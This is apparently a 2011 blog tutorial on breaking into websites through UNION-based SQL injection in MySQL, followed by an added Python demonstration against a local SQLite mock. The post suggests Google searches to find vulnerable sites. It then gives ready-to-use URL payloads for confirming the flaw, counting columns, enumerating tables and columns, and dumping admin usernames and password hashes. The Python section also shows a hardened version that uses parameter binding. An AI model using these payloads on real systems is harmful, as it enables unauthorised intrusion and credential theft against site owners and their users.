Thursday, 8 December 2011

Hack SQL Vulnerable Websites In 8 Steps (SQL Injection)

You have probably already seen the most basic form of SQL injection, the login bypass where a string like 1' or '1' = '1 is typed into the admin and password fields. (That trick is often mislabelled "Blind SQL Injection"; blind injection is actually a different and slower technique in which the page shows no data and the attacker infers one bit at a time from a true/false difference or a time delay.) Today I will show how to go further and pull data out of the database of a vulnerable site using UNION-based injection against MySQL. This tutorial is only for educational purpose; it shows how the database behind a vulnerable site is attacked. Follow these steps:


  1. Find a page whose URL passes a parameter straight into a database query, for e.g.
    http://www.example.com/index.php?id=3 (Easy way to find candidates is to google for them using "inurl:")
  2. Check whether it's vulnerable or not: enter a ' after the 3 in the url, for e.g.
    http://www.example.com/index.php?id=3'

    The stray quote breaks the syntax of the query. If the page shows a database error (on MySQL typically "You have an error in your SQL syntax"), your input is reaching the query unescaped and you can continue. If the page loads without error, the input is probably being escaped or cast to a number, but that is not proof: many sites simply hide their errors. A second check is to compare id=3 and 1=1 (page loads normally) with id=3 and 1=2 (page loads but the content is missing); a difference between the two means the database is evaluating your condition, and the site is vulnerable even though it shows no error.
  3. Now find the number of columns in the query using "order by", for e.g.
    http://www.example.com/index.php?id=3 order by 1--
    http://www.example.com/index.php?id=3 order by 2--
    http://www.example.com/index.php?id=3 order by 3--
    http://www.example.com/index.php?id=3 order by 4--
    http://www.example.com/index.php?id=3 order by 5--
    http://www.example.com/index.php?id=3 order by 6--

    "order by n" sorts on the nth column of the SELECT, so it keeps working until n is larger than the number of columns the query selects. If "order by 5" loads fine and "order by 6" gives an error (or an empty page), the query selects 5 columns; if "order by 8" is the first one to fail, it selects 7. Note that MySQL only treats -- as a comment when it is followed by a space, and browsers tend to strip a trailing space from the URL, so write it as --+ or -- - if the plain form does not work.
  4. Now find which of the 5 columns are displayed on the page, for e.g.
    http://www.example.com/index.php?id=3 union all select 1,2,3,4,5--

    The UNION must select exactly as many columns as the original query, which is why step 3 matters. If it executes successfully, some of the numbers 1 to 5 will appear somewhere on the page; for e.g. if 2 and 5 show up, columns 2 and 5 are the ones whose values the page prints, and those are the columns we can use to read data out. If the page only ever shows the first row of results, use an id that does not exist (id=-3) so the original query returns nothing and the injected row is the one displayed.
  5. Find the database version, user & name by putting these functions into the displayed columns (2 and 5 here):
    http://www.example.com/index.php?id=3 union all select 1,user(),3,4,version()--
    http://www.example.com/index.php?id=3 union all select 1,version(),3,4,database()--

    Note: steps 6 and 7 read table and column names from information_schema, which only exists in MySQL 5.0 and above, so if the version starts with 5 (or higher) carry on. On MySQL 4 you have to guess table and column names instead.
     
  6. Now list all the table names in the current database by putting this after the id in the url:
    union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

    For e.g. http://www.example.com/index.php?id=3 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

    group_concat() joins all the table names into one comma-separated string so they fit in a single displayed column (by default MySQL cuts that string at 1024 characters, so on a large schema the list may be truncated). Take a glance at it for useful tables like admin, user etc. Suppose you get a table named admin.
  7. Now list the column names using:
    union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

    For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

    This dumps the columns of every table in the database at once. To see only the columns of the table you care about, replace table_schema=database() with table_name='admin' (if quotes are being filtered, write the name as hex instead: table_name=0x61646d696e). Find some useful columns from it like username, passwd etc.
  8. Final step, retrieving the username & password fields from table admin (as mentioned above), use the command:
    union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
    Where admin is the table name and 0x3a is a colon, used as a separator so each username:passwd pair is readable.

    For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
That's all. Now you have the admin usernames & passwords. Note that most sites store a password hash (typically md5) rather than the plain text, so what you see in passwd is usually a hash that still has to be cracked before it can be used to log in.
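The whole procedure above, steps 3 to 8, as a self-contained Python demonstration that is added here and is not part of the original post. It models the vulnerable index.php as a function that glues the id parameter into the SQL string (vulnerable_page), runs the ORDER BY column count and the UNION extraction against it, and then runs the same attack against a hardened version of the page (safe_page) that casts the id to an integer and binds it as a parameter. SQLite is used in place of MySQL so it runs offline: its sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns, and the || operator does what 0x3a inside group_concat does in MySQL. The schema, the news and admin tables, and the md5 hash in the passwd column are constructed for the example.

```python
import sqlite3

# Constructed demo schema (not from any real site): a 5-column "news" table,
# so the page's 5-column payloads line up, and an "admin" table with one user.
# The passwd value is md5("password"), stored the way many 2011-era sites did.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT, posted TEXT);
INSERT INTO news VALUES (3, 'Third post', 'Lorem ipsum', 'editor', '2011-12-08');
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, passwd TEXT);
INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_page(conn, id_param):
    """Stand-in for index.php?id=...: the parameter is glued into the SQL text."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=" + id_param
    try:
        return {"ok": True, "rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:  # the "page gives error" case from step 2
        return {"ok": False, "error": str(exc)}


def safe_page(conn, id_param):
    """Hardened stand-in: validate the type, then bind the value as a parameter."""
    try:
        id_value = int(id_param)
    except ValueError:
        return {"ok": False, "error": "id must be an integer"}
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=?"
    return {"ok": True, "rows": conn.execute(sql, (id_value,)).fetchall()}


def count_columns(conn, page, max_cols=20):
    """Step 3: ORDER BY n fails as soon as n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        if not page(conn, f"3 ORDER BY {n}-- ")["ok"]:
            return n - 1
    return None


def union_value(conn, page, n_cols, expr, from_clause=""):
    """Steps 4-8: place `expr` in column 2 of a UNION row and read it back.
    id=-1 makes the real query match nothing, so the injected row comes first."""
    cols = ["1"] * n_cols
    cols[1] = expr  # column 2 is the one this demo page displays
    payload = f"-1 UNION ALL SELECT {','.join(cols)} {from_clause}-- "
    result = page(conn, payload)
    if not result["ok"] or not result["rows"]:
        return None
    return result["rows"][0][1]


def run_attack(conn, page):
    """Runs steps 3, 6, 7 and 8 against `page`; returns None if it is not injectable."""
    n_cols = count_columns(conn, page)
    if not n_cols:
        return None
    # sqlite_master and pragma_table_info() stand in for MySQL's
    # information_schema.tables / information_schema.columns.
    tables = union_value(conn, page, n_cols, "group_concat(name)",
                         "FROM sqlite_master WHERE type='table'")
    admin_columns = union_value(conn, page, n_cols, "group_concat(name)",
                                "FROM pragma_table_info('admin')")
    # '||' is SQLite concatenation; MySQL's group_concat(username,0x3a,passwd) does the same.
    creds = union_value(conn, page, n_cols,
                        "group_concat(username || ':' || passwd)", "FROM admin")
    return {"columns_in_query": n_cols, "tables": tables,
            "admin_columns": admin_columns, "creds": creds}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable page:", run_attack(db, vulnerable_page))
    print("hardened page:  ", run_attack(db, safe_page))
```

Against vulnerable_page the run reports 5 columns, the table list news,admin, the admin columns id,username,passwd and the credential string admin:5f4dcc3b5aa765d61d8327deb882cf99. Against safe_page every payload is rejected before it reaches the database, so count_columns finds nothing and the attack stops at step 3; the fix is the parameter binding, not the error hiding.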
